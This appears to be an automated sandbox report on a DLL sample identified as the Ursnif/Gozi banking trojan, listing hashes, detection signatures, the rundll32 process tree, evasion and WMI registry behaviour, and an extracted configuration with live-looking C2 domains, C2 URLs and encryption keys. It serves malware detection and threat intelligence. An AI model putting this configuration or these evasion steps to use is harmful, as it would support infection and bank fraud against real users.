Analysis Report shorefront.eps

Overview

General Information

Sample Name: shorefront.eps (renamed file extension from eps to dll)
Analysis ID: 429225
MD5: b3526bc3c4a61f9f09ac31ee9a5fc8a5
SHA1: d92ac3fa9cca4ed8273111f767e24d8f53896787
SHA256: f4a464c2e5f14cd4c391a9b5ba60deca36ccaa6c1503a097eeb0c5070945d1fb
Tags: dll, Gozi

Detection

Ursnif
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Machine Learning detection for sample
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6604 cmdline: loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6612 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6640 cmdline: rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6628 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6700 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6720 cmdline: rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 816 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6476 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4136 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "YO4ItoAHj27nQHcek0ajLmmby9wzIPBRe+hTTGA+vdmBx9WHGSmH+27G6fUvU8FIdumcsGzdR3nVucsR89Hrym0hEi/6912U3fz8nLZTmfMNITP1haHrjk4931u8AJbwFobO2OROdhnUSaxTMA4bUUhDQ512s4Mw9dwF+RVgzByOOXZjTb/8c7RAb5TF3S9udlcSUcG0UgRjjerDAkFDNoGfvrRUbQdmhzdTQTVlAQndB1/gGmNmYRjiDY3ZPIgGCxRg+L7+cRtLwnqkaPMhiWWYFszaBPeJgqFJ28z3OWmw84N+FITvVekj/sQLKPQHnW1Axm22vEhQb3UNvpyJEVFYrda06XMVSGm1E2H2wkQ=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "4500", "server": "580", "serpent_key": "46uoXhSnsCfVUpSs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.3.rundll32.exe.3218d26.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.6c500000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.3.loaddll32.exe.538d26.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.3.rundll32.exe.30e8d26.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.2228d26.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (same configuration as listed under Malware Configuration)
Multi AV Scanner detection for domain / URL
Source: app.buboleinov.com, Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: shorefront.dll, Virustotal: Detection: 46%
Source: shorefront.dll, ReversingLabs: Detection: 54%
Machine Learning detection for sample
Source: shorefront.dll, Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_005035A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_005035A1
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_047735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_047735A1
Source: shorefront.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: shorefront.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Original-shine\bat\Cat\page\Seven\Design.pdb source: loaddll32.exe, rundll32.exe, shorefront.dll
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00504E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00504E9C
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04774E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_04774E9C
Source: unknown, DNS traffic detected: queries for: app.buboleinov.com
Source: ~DF762A57E90D6A65CD.TMP.12.dr, {B147A470-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr, String found in binary or memory: http://app.buboleinov.com/7dGVcD7hOw3lYt5/1yqoO_2BT5cAFQCvp3/7fGu2bPOM/Y70HlHuovLn2gp_2B2GH/4_2FYxaP
Source: {B147A472-C485-11EB-90EB-ECF4BBEA1588}.dat.12.dr, String found in binary or memory: http://app.buboleinov.com/BHxjQVeA3bCRL3A0U_2Bhx/6Mf2XW6xM9nlO/OBBDiHLG/gVHcEz5iH6i5Er6PkMAnMWX/IOi2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C5018D1 GetProcAddress,NtCreateSection,memset,0_2_6C5018D1
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C501B89 NtMapViewOfSection,0_2_6C501B89
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C502485 NtQueryVirtualMemory,0_2_6C502485
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00503CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00503CA1
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_005081CD NtQueryVirtualMemory,0_2_005081CD
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04773CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04773CA1
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_047781CD NtQueryVirtualMemory,3_2_047781CD
Source: C:\Windows\System32\loaddll32.exe, Code function: String function: 6C54B330 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6C54B330 appears 40 times
Source: shorefront.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine, Classification label: mal92.troj.winDLL@16/17@6/0
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_005019E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_005019E7
Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B147A46E-C485-11EB-90EB-ECF4BBEA1588}.dat
Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Temp\~DF896FBAE33087E32E.TMP
Source: shorefront.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe, File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll'
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat
Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{79eac9d0-baf9-11ce-8c82-00aa004ba90b}\InprocServer32
Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: shorefront.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C501F31 LoadLibraryA,GetProcAddress,0_2_6C501F31
Source: shorefront.dll, Static PE information: real checksum: 0x6f44b should be: 0x6430b
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C502253 push ecx; ret 0_2_6C502263
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C502200 push ecx; ret 0_2_6C502209
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0050B67C push ss; retf 0_2_0050B690
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00507C20 push ecx; ret 0_2_00507C29
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_0050B163 push edx; iretd 0_2_0050B164
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_00507F97 push ecx; ret 0_2_00507FA7
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C51242B pushad ; ret 0_2_6C51242C
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C510DDC push edi; ret 0_2_6C510DE4
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C511F8E push esp; ret 0_2_6C511F8F
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C546847 push ecx; ret 0_2_6C54685A
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6C54B375 push ecx; ret 0_2_6C54B388
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0477B67C push ss; retf 3_2_0477B690
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04777C20 push ecx; ret 3_2_04777C29
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_0477B163 push edx; iretd 3_2_0477B164
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_04777F97 push ecx; ret 3_2_04777FA7
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6C51242B pushad ; ret 3_2_6C51242C
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6C510DDC push edi; ret 3_2_6C510DE4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6C511F8E push esp; ret 3_2_6C511F8F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6C546847 push ecx; ret 3_2_6C54685A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6C54B375 push ecx; ret 3_2_6C54B388

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6640, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6604, type: MEMORY
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3218d26.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6c500000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.538d26.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.30e8d26.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2228d26.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.27f8d26.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6c500000.3.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C50FC64 str word ptr [eax+00h]0_2_6C50FC64
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00504E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00504E9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04774E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_04774E9C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C54DD9B IsDebuggerPresent,0_2_6C54DD9B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C55603F ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6C55603F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C501F31 LoadLibraryA,GetProcAddress,0_2_6C501F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C55F1E7 mov eax, dword ptr fs:[00000030h]0_2_6C55F1E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C55F11D mov eax, dword ptr fs:[00000030h]0_2_6C55F11D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C55ED24 push dword ptr fs:[00000030h]0_2_6C55ED24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6C55F11D mov eax, dword ptr fs:[00000030h]3_2_6C55F11D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6C55ED24 push dword ptr fs:[00000030h]3_2_6C55ED24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C54B524 GetProcessHeap,0_2_6C54B524
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6C548B1A __call_reportfault,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C548B1A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6C548B1A __call_reportfault,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C548B1A
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.916973157.0000000000D20000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.917409862.0000000002D40000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00503946 cpuid 0_2_00503946
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6C501566
                      Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6C54ACFA
                      Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6C556DEC
                      Source: C:\Windows\System32\loaddll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6C556F16
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_6C556FC3
                      Source: C:\Windows\System32\loaddll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6C556843
                      Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_6C554020
                      Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_6C546A76
                      Source: C:\Windows\System32\loaddll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_6C553A1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6C553234
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6C54AAC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6C556AF7
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6C54AAFD
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6C556AB7
                      Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6C556B74
                      Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6C556BF7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_6C54ACFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_6C556DEC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6C556F16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_6C556FC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_6C556843
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocale